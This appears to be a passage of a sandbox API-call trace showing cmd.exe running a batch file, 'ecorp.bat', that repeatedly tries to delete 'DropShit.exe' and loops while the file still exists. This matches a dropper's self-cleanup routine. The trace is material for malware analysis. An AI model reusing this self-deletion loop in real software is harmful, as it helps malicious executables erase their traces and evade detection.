WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.943] GetFileType (hFile=0x7) returned 0x2 [0091.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.943] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.943] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.943] GetFileType (hFile=0x7) returned 0x2 [0091.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.944] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.944] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.944] GetFileType (hFile=0x7) returned 0x2 [0091.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.944] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.945] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.945] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.945] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.945] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26ccf0 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26cd30 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26cd30, Size=0x30) returned 0x26cd30 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26cd30) returned 0x30 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.945] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.945] GetProcessHeap () returned 0x250000 [0091.945] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cd70 [0091.946] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.946] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.946] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.946] GetProcessHeap () returned 0x250000 [0091.946] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cdd0 [0091.946] GetProcessHeap () returned 0x250000 [0091.946] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0091.946] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.946] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.946] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.946] GetProcessHeap () returned 0x250000 [0091.946] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0091.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.946] SetErrorMode (uMode=0x0) returned 0x0 [0091.946] SetErrorMode (uMode=0x1) returned 0x0 [0091.946] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.946] SetErrorMode (uMode=0x0) returned 0x1 [0091.946] GetProcessHeap () returned 0x250000 [0091.946] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0091.946] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.946] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.946] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.947] GetProcessHeap () returned 0x250000 [0091.947] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.947] GetProcessHeap () returned 0x250000 [0091.947] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26ce30 [0091.947] GetProcessHeap () returned 0x250000 [0091.947] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26f170 [0091.947] GetProcessHeap () returned 0x250000 [0091.947] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f1e0 [0091.947] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f4) returned 0x26cea0 [0091.947] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.947] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.947] GetLastError () returned 0x5 [0091.947] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.947] GetFileType (hFile=0x7) returned 0x2 [0091.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.947] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.948] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.948] _get_osfhandle (_FileHandle=2) returned 0xb [0091.948] GetFileType (hFile=0xb) returned 0x2 [0091.948] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.948] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.949] _get_osfhandle (_FileHandle=2) returned 0xb [0091.949] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.949] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.949] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.949] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.949] FindNextFileW (in: hFindFile=0x26cea0, lpFindFileData=0x26f1f4 | out: lpFindFileData=0x26f1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.949] GetLastError () returned 0x12 [0091.949] FindClose (in: hFindFile=0x26cea0 | out: hFindFile=0x26cea0) returned 1 [0091.949] GetProcessHeap () returned 0x250000 [0091.949] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f1e0 | out: hHeap=0x250000) returned 1 [0091.949] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ce30 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd70 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.950] GetProcessHeap () returned 0x250000 [0091.950] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd30 | out: hHeap=0x250000) returned 1 [0091.950] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.950] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.950] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.950] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.950] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.950] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.951] SetConsoleInputExeNameW () returned 0x1 [0091.951] GetConsoleOutputCP () returned 0x1b5 [0091.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.951] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.951] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.951] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.951] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.951] GetProcessHeap () returned 0x250000 [0091.951] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.951] GetProcessHeap () returned 0x250000 [0091.951] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.951] GetProcessHeap () returned 0x250000 [0091.951] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.951] GetProcessHeap () returned 0x250000 [0091.951] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.951] GetProcessHeap () returned 0x250000 [0091.951] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0091.951] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.951] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.951] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.951] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.952] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.952] GetFileType (hFile=0x5c) returned 0x1 [0091.952] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.952] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0091.952] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0091.952] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.952] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x26ccf0 [0091.952] GetProcessHeap () returned 0x250000 [0091.952] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0091.953] GetProcessHeap () returned 0x250000 [0091.953] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0091.953] GetProcessHeap () returned 0x250000 [0091.953] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0091.953] GetProcessHeap () returned 0x250000 [0091.953] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.953] GetProcessHeap () returned 0x250000 [0091.953] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.953] _tell (_FileHandle=3) returned 66 [0091.953] _close (_FileHandle=3) returned 0 [0091.953] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.953] GetFileType (hFile=0x7) returned 0x2 [0091.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.993] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.994] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.994] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.994] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.994] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.994] GetFileType (hFile=0x7) returned 0x2 [0091.994] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.994] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.994] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.994] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.994] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.994] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.994] GetFileType (hFile=0x7) returned 0x2 [0091.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.995] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.995] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.995] GetFileType (hFile=0x7) returned 0x2 [0091.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.996] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.996] GetFileType (hFile=0x7) returned 0x2 [0091.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.996] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.996] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.996] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.996] GetFileType (hFile=0x7) returned 0x2 [0091.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.997] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.997] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.997] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.997] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.997] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.997] GetFileType (hFile=0x7) returned 0x2 [0091.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.997] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.998] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.998] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.998] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.998] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x26cd30 [0091.998] FindClose (in: hFindFile=0x26cd30 | out: hFindFile=0x26cd30) returned 1 [0091.998] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.998] GetProcessHeap () returned 0x250000 [0091.998] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.998] GetProcessHeap () returned 0x250000 [0091.998] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.999] GetProcessHeap () returned 0x250000 [0091.999] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.999] GetProcessHeap () returned 0x250000 [0091.999] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.999] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] GetFileType (hFile=0x5c) returned 0x1 [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.999] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.999] 